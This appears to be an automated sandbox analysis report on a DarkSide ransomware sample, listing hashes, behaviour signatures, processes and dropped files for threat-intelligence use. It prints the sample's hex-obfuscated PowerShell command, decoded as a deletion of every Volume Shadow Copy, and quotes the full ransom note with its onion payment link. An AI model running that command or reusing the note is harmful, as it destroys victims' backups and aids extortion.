Resubmissions

31/03/2025, 00:22

250331-apdw1ssjs8 10

28/03/2025, 22:52

250328-2tfd7avl15 10

25/03/2025, 14:57

250325-sb3mbsxxht 10

Analysis

  • max time kernel: 488s
  • max time network: 487s
  • platform: windows10-ltsc_2021_x64
  • resource: win10ltsc2021-20250314-en
  • resource tags: arch:x64, arch:x86, image:win10ltsc2021-20250314-en, locale:en-us, os:windows10-ltsc_2021-x64, system
  • submitted: 31/03/2025, 00:22

Errors

Reason: Machine shutdown

General

  • Target: RansomwareSamples/DarkSide_16_01_2021_59KB.exe
  • Size: 59KB
  • MD5: 0ed51a595631e9b4d60896ab5573332f
  • SHA1: 7ae73b5e1622049380c9b615ce3b7f636665584b
  • SHA256: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
  • SHA512: 9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5
  • SSDEEP: 768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1yl3RYY23W58:0x7Fu4/ihrhDTV1ylhZ58

Malware Config

Extracted

  • Path: C:\Recovery\WindowsRE\README.9a401f55.TXT
  • Family: darkside
  • Ransom Note:

    ----------- [ Welcome to DarkSide - I-D Foods Corporation] ------------->
    What happend?
    ----------------------------------------------
    Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data.
    But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network.
    Follow our instructions below and you will recover all your data.
    What guarantees?
    ----------------------------------------------
    We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests.
    All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems.
    We guarantee to decrypt one file for free. Go to the site and contact us.
    How to get access on website?
    ----------------------------------------------
    Using a TOR browser:
    1) Download and install TOR browser from this site: https://torproject.org/
    2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
    When you open our website, put the following data in the input form:
    Key: [removed]
    !!! DANGER !!!
    DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them.
    !!! DANGER !!!

  • URLs: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Darkside family
  • Renames multiple (151) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 1 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 7 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of FindShellTrayWindow 43 IoCs
  • Suspicious use of SendNotifyMessage 42 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe
    "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"
    • Sets desktop wallpaper using registry
    • System Location Discovery: System Language Discovery
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 2444)
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      The hex string decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      This deletes every Volume Shadow Copy on the host, which destroys local restore points and explains the vssvc.exe activity and the "Uses Volume Shadow Copy service COM API" signature above.
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2352
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    • Suspicious use of AdjustPrivilegeToken
    PID:1876
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.9a401f55.TXT
    • Opens file in notepad (likely ransom note)
    • Suspicious use of FindShellTrayWindow
    PID:4212
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:116
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\CompleteProtect.svg.txt
    • Opens file in notepad (likely ransom note)
    PID:3592
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /7
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:5848
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    PID:5196
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
    • System Location Discovery: System Language Discovery
    PID:5756
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
    • System Location Discovery: System Language Discovery
    PID:1156
  • C:\Windows\System32\CastSrv.exe
    C:\Windows\System32\CastSrv.exe CCastServerControlInteractiveUser -Embedding
    • Modifies registry class
    PID:1496
  • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    PID:1052
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
    PID:4004
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x4b4 0x324
    • Suspicious use of AdjustPrivilegeToken
    PID:4920
  • C:\Windows\system32\SystemSettingsAdminFlows.exe
    "C:\Windows\system32\SystemSettingsAdminFlows.exe" TurnOffDevicePortal
    PID:5060
  • C:\Windows\system32\SystemSettingsAdminFlows.exe
    "C:\Windows\system32\SystemSettingsAdminFlows.exe" TurnOffDevicePortal
    PID:4100
  • C:\Windows\system32\SystemSettingsAdminFlows.exe
    "C:\Windows\system32\SystemSettingsAdminFlows.exe" FeaturedResetPC
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:4916
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa398a055 /state1:0x41c64e6d
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:5688
  • C:\Windows\system32\bootim.exe
    bootim.exe /startpage:1
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    PID:2376

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Recovery\WindowsRE\README.9a401f55.TXT
    Filesize: 1KB
    MD5: d4e176b40c4ea17f4870c34fad926d6e
    SHA1: 2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
    SHA256: 7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
    SHA512: feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 3KB
    MD5: 4521e67a3b03b060fde700c36d3b9297
    SHA1: 4a730cd86dc7a57ac001d59853dd500c1b83b4ab
    SHA256: a72aa223a84c4fa011c8a2b0ef2475a83d5123de2cdfa6a7160231729e68383d
    SHA512: 90235850eef71c2f0921d04e6990147af9e76fec8ee49e12e6a5bab065ff0e63331a54be845026f17a7b1dd230ee94843099db4813c127c6bafb8cbaf59b753f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 75c7d4a084b3113fb3aeac7d33a681c6
    SHA1: 689bbd08e3bbb66ada48dcac1b767c673d33f6c0
    SHA256: 355e7f6e3e8d956e6d33ddd6f0bb7bd9b2c81eaf7ed99e74145b2d3f65a6977d
    SHA512: e1a9340e40d402fe493c7642348db22c6721a43f75822871e82abc34fdd09350dd301097202ae1eb4a39b2d8fb7a3a270617978170389860a74bc1b6ea9199c8

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zhzz4v5a.egf.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\Desktop\CompleteProtect.svg.txt
    Filesize: 625KB
    MD5: 63e6df8afefc85f644bb27bd3fc47b63
    SHA1: 9538028935d56397adad6893bbcd99285e480039
    SHA256: 9ef580e129104e99d400b722d44d07ff614bbb4a1028e26e94cfe87bb6c13ce5
    SHA512: 72ee70d52d749ead1e7e0019481b1e49c542d916c4e8f13be3b1dab0e7b19977473eebacdd04b0a69817d58056ec2049b48bfdf0abacab3008a409c40115454a

  • memory/2352-14-0x00007FF9FBE40000-0x00007FF9FC902000-memory.dmp (Filesize: 10.8MB)
  • memory/2352-17-0x00007FF9FBE40000-0x00007FF9FC902000-memory.dmp (Filesize: 10.8MB)
  • memory/2352-1-0x00007FF9FBE43000-0x00007FF9FBE45000-memory.dmp (Filesize: 8KB)
  • memory/2352-13-0x00007FF9FBE40000-0x00007FF9FC902000-memory.dmp (Filesize: 10.8MB)
  • memory/2352-12-0x00007FF9FBE40000-0x00007FF9FC902000-memory.dmp (Filesize: 10.8MB)
  • memory/2352-2-0x000001667C330000-0x000001667C352000-memory.dmp (Filesize: 136KB)
  • memory/5848-200-0x000001F2034E0000-0x000001F2034E1000-memory.dmp (Filesize: 4KB)
  • memory/5848-199-0x000001F2034E0000-0x000001F2034E1000-memory.dmp (Filesize: 4KB)
  • memory/5848-201-0x000001F2034E0000-0x000001F2034E1000-memory.dmp (Filesize: 4KB)
  • memory/5848-205-0x000001F2034E0000-0x000001F2034E1000-memory.dmp (Filesize: 4KB)
  • memory/5848-211-0x000001F2034E0000-0x000001F2034E1000-memory.dmp (Filesize: 4KB)
  • memory/5848-210-0x000001F2034E0000-0x000001F2034E1000-memory.dmp (Filesize: 4KB)
  • memory/5848-209-0x000001F2034E0000-0x000001F2034E1000-memory.dmp (Filesize: 4KB)
  • memory/5848-208-0x000001F2034E0000-0x000001F2034E1000-memory.dmp (Filesize: 4KB)
  • memory/5848-207-0x000001F2034E0000-0x000001F2034E1000-memory.dmp (Filesize: 4KB)
  • memory/5848-206-0x000001F2034E0000-0x000001F2034E1000-memory.dmp (Filesize: 4KB)